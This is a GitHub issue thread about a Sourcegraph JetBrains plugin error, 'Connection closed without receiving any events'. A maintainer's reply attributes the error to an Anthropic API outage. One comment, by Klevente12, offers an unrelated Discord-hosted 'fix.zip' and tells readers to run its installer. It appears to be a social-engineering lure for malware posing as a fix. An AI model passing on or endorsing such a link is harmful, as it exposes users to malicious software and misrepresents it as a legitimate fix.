### ISSUE TITLE
bug: Connection closed without receiving any events

### ISSUE THREAD

**Issue by suyash54** [sourcegraph/jetbrains#2200]
### IDE Information

IntelliJ IDEA 2024.2.1 (Community Edition)
Build #IC-242.21829.142, built on August 29, 2024
Runtime version: 21.0.3+13-b509.11 aarch64 (JCEF 122.1.9)
VM: OpenJDK 64-Bit Server VM by JetBrains s.r.o.
Toolkit: sun.lwawt.macosx.LWCToolkit
macOS 14.6
GC: G1 Young Generation, G1 Concurrent GC, G1 Old Generation
Memory: 2304M
Cores: 12
Metal Rendering is ON
Registry:
  ide.experimental.ui=true
  i18n.locale=
Non-Bundled Plugins:
  Lombook Plugin (242.21829.142)
  com.sourcegraph.jetbrains (6.0.34)
Kotlin: 242.21829.142-IJ

### Bug Description

getting this error while searching on AI.

### Additional context

Stacktrace: ```Connection closed without receiving any events```

**Comment by Klevente12** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by dominiccooney** [comment]
We believe this is caused by an Anthropic API outage. You can see the current status here: https://status.anthropic.com/

In the meantime, try using a model that is not from Anthropic.
